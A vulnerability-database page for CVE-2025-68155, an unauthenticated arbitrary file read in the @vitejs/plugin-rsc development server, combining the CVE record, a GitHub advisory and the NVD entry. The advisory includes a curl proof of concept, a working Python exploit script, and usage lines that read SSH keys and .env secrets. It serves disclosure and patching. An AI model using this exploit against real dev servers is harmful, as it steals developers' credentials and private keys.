cvelistv5 - cve-2025-68155

CVE-2025-68155 (GCVE-0-2025-68155)

Vulnerability from cvelistv5 – Published: 2025-12-16 18:20 – Updated: 2025-12-16 21:48

Summary

@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-73 - External Control of File Name or Path

Assigner

GitHub_M

References

URL

Tags

	https://github.com/vitejs/vite-plugin-react/secur…	x_refsource_CONFIRM
	https://github.com/facebook/react/pull/29708	x_refsource_MISC
	https://github.com/facebook/react/pull/30741	x_refsource_MISC
	https://github.com/vitejs/vite-plugin-react/commi…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	vitejs	vite-plugin-react	Affected: < 0.5.8

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68155",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-16T21:47:42.775601Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-16T21:48:33.959Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vite-plugin-react",
          "vendor": "vitejs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.5.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-73",
              "description": "CWE-73: External Control of File Name or Path",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-16T18:20:51.428Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm"
        },
        {
          "name": "https://github.com/facebook/react/pull/29708",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/facebook/react/pull/29708"
        },
        {
          "name": "https://github.com/facebook/react/pull/30741",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/facebook/react/pull/30741"
        },
        {
          "name": "https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d"
        }
      ],
      "source": {
        "advisory": "GHSA-g239-q96q-x4qm",
        "discovery": "UNKNOWN"
      },
      "title": "@vitejs/plugin-rsc has Arbitrary File Read via `/__vite_rsc_findSourceMapURL` Endpoint on Development"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68155",
    "datePublished": "2025-12-16T18:20:51.428Z",
    "dateReserved": "2025-12-15T23:02:17.603Z",
    "dateUpdated": "2025-12-16T21:48:33.959Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68155\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-16T19:16:00.410\",\"lastModified\":\"2025-12-16T19:16:00.410\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"lang\":\"en\",\"value\":\"CWE-73\"}]}],\"references\":[{\"url\":\"https://github.com/facebook/react/pull/29708\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/facebook/react/pull/30741\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68155\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-16T21:47:42.775601Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-16T21:47:47.994Z\"}}], \"cna\": {\"title\": \"@vitejs/plugin-rsc has Arbitrary File Read via `/__vite_rsc_findSourceMapURL` Endpoint on Development\", \"source\": {\"advisory\": \"GHSA-g239-q96q-x4qm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"vitejs\", \"product\": \"vite-plugin-react\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.5.8\"}]}], \"references\": [{\"url\": \"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm\", \"name\": \"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/facebook/react/pull/29708\", \"name\": \"https://github.com/facebook/react/pull/29708\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/facebook/react/pull/30741\", \"name\": \"https://github.com/facebook/react/pull/30741\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d\", \"name\": \"https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-73\", \"description\": \"CWE-73: External Control of File Name or Path\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-16T18:20:51.428Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68155\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-16T21:48:33.959Z\", \"dateReserved\": \"2025-12-15T23:02:17.603Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-16T18:20:51.428Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-G239-Q96Q-X4QM

Vulnerability from github – Published: 2025-12-16 22:32 – Updated: 2025-12-16 22:32

Summary

@vitejs/plugin-rsc has an Arbitrary File Read via `/__vite_rsc_findSourceMapURL` Endpoint

Details

Summary

The /__vite_rsc_findSourceMapURL endpoint in @vitejs/plugin-rsc allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a file:// URL in the filename query parameter.

Severity: High Attack Vector: Network
Privileges Required: None
Scope: Development mode only (vite dev)

Impact

Who Is Affected?

All developers using @vitejs/plugin-rsc during development
Projects running vite dev with the RSC plugin enabled

Attack Scenarios

Network-Exposed Dev Servers:
When developers run vite --host 0.0.0.0 (common for mobile testing), attackers on the same network can read files.
~XSS-Based Attacks:~ ~If the application has an XSS vulnerability, malicious JavaScript can fetch sensitive files and exfiltrate them.~
~Malicious Dependencies: ~ ~A compromised npm package could include code that reads files during development.~
~DNS Rebinding:~ (EDIT: This doesn't apply since https://github.com/vitejs/vite/pull/20222) ~An attacker could use DNS rebinding to access the localhost dev server from a malicious website.~

What Can Be Leaked?

Environment files (.env, .env.local, .env.production)
SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519)
Cloud credentials (~/.aws/credentials, ~/.config/gcloud/)
Database passwords and API keys
Source code from other projects
System files (/etc/passwd, /etc/shadow if readable)

Details

Vulnerable Code Location

File: packages/plugin-rsc/src/plugins/find-source-map-url.ts
Lines: 49-61

The vulnerability exists in the findSourceMapURL function:

async function findSourceMapURL(
  server: ViteDevServer,
  filename: string,
  environmentName: string,
): Promise<object | undefined> {
  // this is likely server external (i.e. outside of Vite processing)
  if (filename.startsWith('file://')) {
    filename = fileURLToPath(filename)
    if (fs.existsSync(filename)) {
      // line-by-line identity source map
      const content = fs.readFileSync(filename, 'utf-8')  // ← ARBITRARY FILE READ
      return {
        version: 3,
        sources: [filename],
        sourcesContent: [content],  // ← FILE CONTENTS LEAKED HERE
        mappings: 'AAAA' + ';AACA'.repeat(content.split('\n').length),
      }
    }
    return
  }
  // ... rest of the function
}

Root Cause

The endpoint: 1. Accepts a user-controlled filename parameter from the query string (line 20) 2. Checks if it starts with file:// (line 49) 3. Converts it to a filesystem path using fileURLToPath() (line 50) 4. Reads the file with fs.readFileSync() without any path validation (line 53) 5. Returns the file contents in the JSON response (line 57)

No validation is performed to ensure the requested file is within the project directory or is a legitimate source file.

PoC

Quick Test (Single Command)

If you have a Vite dev server running with @vitejs/plugin-rsc, you can test immediately:

curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

Expected output (file contents in sourcesContent):

{
  "version": 3,
  "sources": ["/etc/passwd"],
  "sourcesContent": ["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/sbin:..."],
  "mappings": "AAAA;AACA;AACA;..."
}

Further details of PoC ### Complete PoC with Docker For a fully reproducible environment, I've prepared a complete PoC: #### Step 1: Create a minimal `vite.config.ts`

import { defineConfig } from 'vite'
import react from '@vitejs/plugin-rsc'

export default defineConfig({
  plugins: [
    react({
      serverHandler: false,
    }),
  ],
})

#### Step 2: Create `package.json`

{
  "name": "poc-vite-rsc-file-read",
  "version": "1.0.0",
  "private": true,
  "type": "module",
  "scripts": {
    "dev": "vite --host 0.0.0.0"
  },
  "dependencies": {
    "react": "^19.0.0",
    "react-dom": "^19.0.0"
  },
  "devDependencies": {
    "@vitejs/plugin-rsc": "latest",
    "vite": "^6.0.0"
  }
}

#### Step 3: Create minimal `index.html` and `src/main.tsx` **index.html:**

<!DOCTYPE html>
<html>
  <body>
    <div id="root"></div>
    <script type="module" src="/src/main.tsx"></script>
  </body>
</html>

**src/main.tsx:**

import React from 'react'
import ReactDOM from 'react-dom/client'
ReactDOM.createRoot(document.getElementById('root')!).render(<div>PoC</div>)

#### Step 4: Start the server and exploit

# Install and start
pnpm install
pnpm dev

# In another terminal, exploit:
curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

### Python Exploit Script For easier testing, here's a Python script:

#!/usr/bin/env python3
"""Exploit: Arbitrary File Read via /__vite_rsc_findSourceMapURL"""

import json
import sys
import urllib.request
import urllib.parse

def read_file(host, port, file_path):
    """Read a file from the target server via the vulnerability."""
    url = f"http://{host}:{port}/__vite_rsc_findSourceMapURL"
    params = urllib.parse.urlencode({
        'filename': f'file://{file_path}',
        'environmentName': 'Server'
    })

    try:
        with urllib.request.urlopen(f"{url}?{params}", timeout=10) as response:
            data = json.loads(response.read().decode('utf-8'))
            if 'sourcesContent' in data and data['sourcesContent']:
                return data['sourcesContent'][0]
    except Exception as e:
        return f"Error: {e}"
    return None

if __name__ == '__main__':
    host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
    port = sys.argv[2] if len(sys.argv) > 2 else '5173'
    file_path = sys.argv[3] if len(sys.argv) > 3 else '/etc/passwd'

    content = read_file(host, port, file_path)
    if content:
        print(f"[+] Successfully read {file_path}:")
        print("-" * 60)
        print(content)
        print("-" * 60)
    else:
        print(f"[-] Failed to read {file_path}")

**Usage:**

python3 exploit.py localhost 5173 /etc/passwd
python3 exploit.py localhost 5173 /root/.ssh/id_rsa
python3 exploit.py localhost 5173 /home/user/.env

### Verified Exploitation Results I tested this in a Docker container and successfully read: | File | Description | |------|-------------| | `/etc/passwd` | System user accounts | | `/etc/hosts` | Network configuration | | `/root/.env.secret` | Environment secrets | | `/root/.ssh/id_rsa` | SSH private keys | | `/proc/self/environ` | Process environment variables | | Source code files | Any file in the filesystem | **Example output from `/etc/passwd`:**

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

**Example output from sensitive secrets file:**

SECRET_API_KEY=sk-live-very-secret-key-12345
DB_PASSWORD=super_secret_password
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@vitejs/plugin-rsc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68155"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-16T22:32:26Z",
    "nvd_published_at": "2025-12-16T19:16:00Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows **unauthenticated arbitrary file read** during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter.\n\n**Severity:** High\n**Attack Vector:** Network  \n**Privileges Required:** None  \n**Scope:** Development mode only (`vite dev`)\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- **All developers** using `@vitejs/plugin-rsc` during development\n- Projects running `vite dev` with the RSC plugin enabled\n\n### Attack Scenarios\n\n1. **Network-Exposed Dev Servers:**  \n   When developers run `vite --host 0.0.0.0` (common for mobile testing), attackers on the same network can read files.\n\n2. ~**XSS-Based Attacks:**~\n   ~If the application has an XSS vulnerability, malicious JavaScript can fetch sensitive files and exfiltrate them.~\n\n3. ~**Malicious Dependencies:** ~\n   ~A compromised npm package could include code that reads files during development.~\n\n4. ~**DNS Rebinding:**~ (EDIT: This doesn\u0027t apply since https://github.com/vitejs/vite/pull/20222)\n   ~An attacker could use DNS rebinding to access the localhost dev server from a malicious website.~\n\n### What Can Be Leaked?\n\n- Environment files (`.env`, `.env.local`, `.env.production`)\n- SSH keys (`~/.ssh/id_rsa`, `~/.ssh/id_ed25519`)\n- Cloud credentials (`~/.aws/credentials`, `~/.config/gcloud/`)\n- Database passwords and API keys\n- Source code from other projects\n- System files (`/etc/passwd`, `/etc/shadow` if readable)\n\n---\n\n## Details\n\n### Vulnerable Code Location\n\n**File:** `packages/plugin-rsc/src/plugins/find-source-map-url.ts`  \n**Lines:** 49-61\n\nThe vulnerability exists in the `findSourceMapURL` function:\n\n```typescript\nasync function findSourceMapURL(\n  server: ViteDevServer,\n  filename: string,\n  environmentName: string,\n): Promise\u003cobject | undefined\u003e {\n  // this is likely server external (i.e. outside of Vite processing)\n  if (filename.startsWith(\u0027file://\u0027)) {\n    filename = fileURLToPath(filename)\n    if (fs.existsSync(filename)) {\n      // line-by-line identity source map\n      const content = fs.readFileSync(filename, \u0027utf-8\u0027)  // \u2190 ARBITRARY FILE READ\n      return {\n        version: 3,\n        sources: [filename],\n        sourcesContent: [content],  // \u2190 FILE CONTENTS LEAKED HERE\n        mappings: \u0027AAAA\u0027 + \u0027;AACA\u0027.repeat(content.split(\u0027\\n\u0027).length),\n      }\n    }\n    return\n  }\n  // ... rest of the function\n}\n```\n\n### Root Cause\n\nThe endpoint:\n1. Accepts a user-controlled `filename` parameter from the query string (line 20)\n2. Checks if it starts with `file://` (line 49)\n3. Converts it to a filesystem path using `fileURLToPath()` (line 50)\n4. Reads the file with `fs.readFileSync()` **without any path validation** (line 53)\n5. Returns the file contents in the JSON response (line 57)\n\n**No validation is performed** to ensure the requested file is within the project directory or is a legitimate source file.\n\n---\n\n## PoC\n\n### Quick Test (Single Command)\n\nIf you have a Vite dev server running with `@vitejs/plugin-rsc`, you can test immediately:\n\n```bash\ncurl \u0027http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd\u0026environmentName=Server\u0027\n```\n\n**Expected output** (file contents in `sourcesContent`):\n\n```json\n{\n  \"version\": 3,\n  \"sources\": [\"/etc/passwd\"],\n  \"sourcesContent\": [\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/sbin:...\"],\n  \"mappings\": \"AAAA;AACA;AACA;...\"\n}\n```\n\n\u003cdetails\u003e\u003csummary\u003eFurther details of PoC\u003c/summary\u003e\n\n### Complete PoC with Docker\n\nFor a fully reproducible environment, I\u0027ve prepared a complete PoC:\n\n#### Step 1: Create a minimal `vite.config.ts`\n\n```typescript\nimport { defineConfig } from \u0027vite\u0027\nimport react from \u0027@vitejs/plugin-rsc\u0027\n\nexport default defineConfig({\n  plugins: [\n    react({\n      serverHandler: false,\n    }),\n  ],\n})\n```\n\n#### Step 2: Create `package.json`\n\n```json\n{\n  \"name\": \"poc-vite-rsc-file-read\",\n  \"version\": \"1.0.0\",\n  \"private\": true,\n  \"type\": \"module\",\n  \"scripts\": {\n    \"dev\": \"vite --host 0.0.0.0\"\n  },\n  \"dependencies\": {\n    \"react\": \"^19.0.0\",\n    \"react-dom\": \"^19.0.0\"\n  },\n  \"devDependencies\": {\n    \"@vitejs/plugin-rsc\": \"latest\",\n    \"vite\": \"^6.0.0\"\n  }\n}\n```\n\n#### Step 3: Create minimal `index.html` and `src/main.tsx`\n\n**index.html:**\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cdiv id=\"root\"\u003e\u003c/div\u003e\n    \u003cscript type=\"module\" src=\"/src/main.tsx\"\u003e\u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n\n**src/main.tsx:**\n```tsx\nimport React from \u0027react\u0027\nimport ReactDOM from \u0027react-dom/client\u0027\nReactDOM.createRoot(document.getElementById(\u0027root\u0027)!).render(\u003cdiv\u003ePoC\u003c/div\u003e)\n```\n\n#### Step 4: Start the server and exploit\n\n```bash\n# Install and start\npnpm install\npnpm dev\n\n# In another terminal, exploit:\ncurl \u0027http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd\u0026environmentName=Server\u0027\n```\n\n### Python Exploit Script\n\nFor easier testing, here\u0027s a Python script:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Exploit: Arbitrary File Read via /__vite_rsc_findSourceMapURL\"\"\"\n\nimport json\nimport sys\nimport urllib.request\nimport urllib.parse\n\ndef read_file(host, port, file_path):\n    \"\"\"Read a file from the target server via the vulnerability.\"\"\"\n    url = f\"http://{host}:{port}/__vite_rsc_findSourceMapURL\"\n    params = urllib.parse.urlencode({\n        \u0027filename\u0027: f\u0027file://{file_path}\u0027,\n        \u0027environmentName\u0027: \u0027Server\u0027\n    })\n    \n    try:\n        with urllib.request.urlopen(f\"{url}?{params}\", timeout=10) as response:\n            data = json.loads(response.read().decode(\u0027utf-8\u0027))\n            if \u0027sourcesContent\u0027 in data and data[\u0027sourcesContent\u0027]:\n                return data[\u0027sourcesContent\u0027][0]\n    except Exception as e:\n        return f\"Error: {e}\"\n    return None\n\nif __name__ == \u0027__main__\u0027:\n    host = sys.argv[1] if len(sys.argv) \u003e 1 else \u0027localhost\u0027\n    port = sys.argv[2] if len(sys.argv) \u003e 2 else \u00275173\u0027\n    file_path = sys.argv[3] if len(sys.argv) \u003e 3 else \u0027/etc/passwd\u0027\n    \n    content = read_file(host, port, file_path)\n    if content:\n        print(f\"[+] Successfully read {file_path}:\")\n        print(\"-\" * 60)\n        print(content)\n        print(\"-\" * 60)\n    else:\n        print(f\"[-] Failed to read {file_path}\")\n```\n\n**Usage:**\n```bash\npython3 exploit.py localhost 5173 /etc/passwd\npython3 exploit.py localhost 5173 /root/.ssh/id_rsa\npython3 exploit.py localhost 5173 /home/user/.env\n```\n\n### Verified Exploitation Results\n\nI tested this in a Docker container and successfully read:\n\n| File | Description |\n|------|-------------|\n| `/etc/passwd` | System user accounts |\n| `/etc/hosts` | Network configuration |\n| `/root/.env.secret` | Environment secrets |\n| `/root/.ssh/id_rsa` | SSH private keys |\n| `/proc/self/environ` | Process environment variables |\n| Source code files | Any file in the filesystem |\n\n**Example output from `/etc/passwd`:**\n\n```\nroot:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nnode:x:1000:1000::/home/node:/bin/sh\n```\n\n**Example output from sensitive secrets file:**\n\n```\nSECRET_API_KEY=sk-live-very-secret-key-12345\nDB_PASSWORD=super_secret_password\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n```\n\n\u003c/details\u003e\n\n---",
  "id": "GHSA-g239-q96q-x4qm",
  "modified": "2025-12-16T22:32:27Z",
  "published": "2025-12-16T22:32:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68155"
    },
    {
      "type": "WEB",
      "url": "https://github.com/facebook/react/pull/29708"
    },
    {
      "type": "WEB",
      "url": "https://github.com/facebook/react/pull/30741"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vitejs/vite-plugin-react"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@vitejs/plugin-rsc has an Arbitrary File Read via `/__vite_rsc_findSourceMapURL` Endpoint"
}

FKIE_CVE-2025-68155

Vulnerability from fkie_nvd - Published: 2025-12-16 19:16 - Updated: 2025-12-16 19:16

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/facebook/react/pull/29708
	security-advisories@github.com	https://github.com/facebook/react/pull/30741
	security-advisories@github.com	https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d
	security-advisories@github.com	https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "@vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue."
    }
  ],
  "id": "CVE-2025-68155",
  "lastModified": "2025-12-16T19:16:00.410",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-16T19:16:00.410",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/facebook/react/pull/29708"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/facebook/react/pull/30741"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        },
        {
          "lang": "en",
          "value": "CWE-73"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

